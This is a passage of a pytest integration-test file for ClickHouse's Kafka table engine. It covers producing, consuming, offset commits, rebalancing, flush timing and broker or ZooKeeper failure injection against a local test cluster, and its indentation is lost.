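    # Producing via INSERT into the Kafka engine table can transiently fail with
    # 'Local: Timed out.'; retry until the INSERT succeeds.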
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume('insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
@pytest.mark.timeout(240)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
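    # Drop and re-create the Kafka table with the same consumer group: if offsets were committed
    # per flushed block, the new consumer resumes from them and no rows are re-read, which is what
    # the uniqExact(key) == count() check at the end verifies.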
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(180)
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
time.sleep(10)
members = describe_consumer_group('virt2')
# pprint.pprint(members)
members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(120)
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="insert3", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
while int(instance.query("SELECT count() FROM test.view")) < 5:
time.sleep(1)
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# print(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(600)
def test_kafka_flush_by_time(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="flush_by_time", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
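    # Expected numbers (informal reasoning): each time-based flush materializes one distinct `ts`
    # value, and with the ~7.5 s default flush interval (mentioned elsewhere in these tests) an
    # 18 s window gives exactly two flushes; producing one message every 0.8 s yields at least
    # 15 flushed rows by then.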
result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
@pytest.mark.timeout(90)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
    # More flushes can happen during the test; we only need to check the result of the first flush (the part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# print(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
    # 100: the first poll should return 100 messages (and rows)
    # without waiting for stream_flush_interval_ms.
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
@pytest.mark.timeout(600)
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211,
kafka_flush_interval_ms = 500;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce('topic_with_multiple_partitions2', messages)
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
@pytest.mark.timeout(1200)
def test_kafka_rebalance(kafka_cluster):
    NUMBER_OF_CONCURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce('topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
    for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
print(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33,
kafka_flush_interval_ms = 500;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
        # Waiting for test.kafka_consumerX to start consuming ...
instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))
cancel.set()
    # Intentionally leave the last one working (to finish consuming after all rebalances).
    for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS - 1):
print(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))
# print(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
print(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
    print(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
    for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
print(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(120)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
''')
    # Initialize PartitionManager early (it starts a container).
pm = PartitionManager()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
    # The tricky part here is that the disconnect should happen after the write prefix, but before the write suffix.
    # We have a 0.25 (sleepEachRow) * 20 (rows) = 5 sec window after "Polled batch of 20 messages",
    # while the materialized view is working, in which to inject the ZooKeeper failure.
pm.drop_instance_zk_connections(instance)
instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while write prefix to view")
pm.heal_all()
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
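# Worked numbers for the failure-injection window used above (a sketch only; these constants
# mirror the test's settings and are not consumed by it): sleepEachRow(0.25) over a block of
# kafka_max_block_size = 20 rows keeps the materialized view busy for about 0.25 * 20 = 5 seconds,
# which is the window in which the ZooKeeper connection is dropped between write prefix and suffix.
SLEEP_PER_ROW_SEC = 0.25
ROWS_PER_BLOCK = 20
FAILURE_INJECTION_WINDOW_SEC = SLEEP_PER_ROW_SEC * ROWS_PER_BLOCK  # ~5 seconds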
@pytest.mark.timeout(120)
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
@pytest.mark.timeout(120)
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination SYNC;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
    # Waiting for test.kafka_consumer to start consuming
instance.wait_for_log_line('Committed offset [0-9]+')
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
time.sleep(0.5)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(4)
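    # Drop the Kafka table while the producer is still running: offsets of messages that were
    # polled but not yet flushed to the MV must not be committed, so the re-created table below
    # can pick them up and the final count shows no missing data.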
instance.query('''
DROP TABLE test.kafka SYNC;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000,
kafka_flush_interval_ms = 1000;
''')
cancel.set()
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
print(result)
instance.query('''
DROP TABLE test.kafka_consumer SYNC;
DROP TABLE test.destination SYNC;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
@pytest.mark.timeout(120)
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce('test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.wait_for_log_line("Committed offset 20000")
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
@pytest.mark.timeout(300)
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
    # The tricky part here is that the disconnect should happen after the write prefix, but before we do the commit.
    # We have a 0.25 (sleepEachRow) * 20 (rows) = 5 sec window after "Polled batch of 20 messages",
    # while the materialized view is working, in which to inject the broker failure (pausing the kafka1 container).
kafka_cluster.pause_container('kafka1')
    # If we restore the connection too fast (< 30 sec), librdkafka will not report any timeout
    # (an alternative is to decrease the default session timeouts for librdkafka).
    #
    # When the delay is too long (> 50 sec), the broker will decide to remove us from the consumer group
    # and will start answering "Broker: Unknown member".
instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
    # After https://github.com/edenhill/librdkafka/issues/2631
    # the timeout triggers a rebalance, making further commits to the topic after getting back online
    # impossible. So we get a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# If we come to the partition end, we will repeat polling until reaching kafka_max_block_size or flush_interval.
# That behavior is a bit questionable - we could just take bigger pauses between polls instead,
# to do more work in a single pass and give the thread more rest.
# But in case of peaky loads on the kafka topic, the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# Also, we can come to EOF because we drained the librdkafka internal queue too fast.
@pytest.mark.timeout(120)
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
    # Messages created here will be consumed immediately after MV creation,
    # reaching topic EOF.
    # But we should not flush immediately after reaching EOF, because
    # the next poll can return more data, and we should respect kafka_flush_interval_ms
    # and try to form a bigger block.
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce('premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
    # All subscriptions/assignments are done during the select, so it starts sending data to test.destination
    # immediately after creation of the MV.
instance.wait_for_log_line("Polled batch of 1 messages")
instance.wait_for_log_line("Stalled")
# produce more messages after delay
kafka_produce('premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
instance.wait_for_log_line("Committed offset 2")
    # it should be a single part, i.e. a single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
@pytest.mark.timeout(120)
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(2000)]
kafka_produce('test_kafka_unavailable', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_kafka_unavailable',
kafka_group_name = 'test_kafka_unavailable',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.query("SELECT * FROM test.kafka")
instance.wait_for_log_line('brokers are down')
instance.wait_for_log_line('stalled. Reschedule', repetitions=2)
kafka_cluster.unpause_container('kafka1')
instance.wait_for_log_line("Committed offset 2000")
assert int(instance.query("SELECT count() FROM test.destination")) == 2000
    time.sleep(5)  # needed to give the kafka client in the python test time to recover
@pytest.mark.timeout(180)
def test_kafka_issue14202(kafka_cluster):
"""
    INSERT INTO a Kafka engine table from an empty SELECT subquery was leading to failure.
"""
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
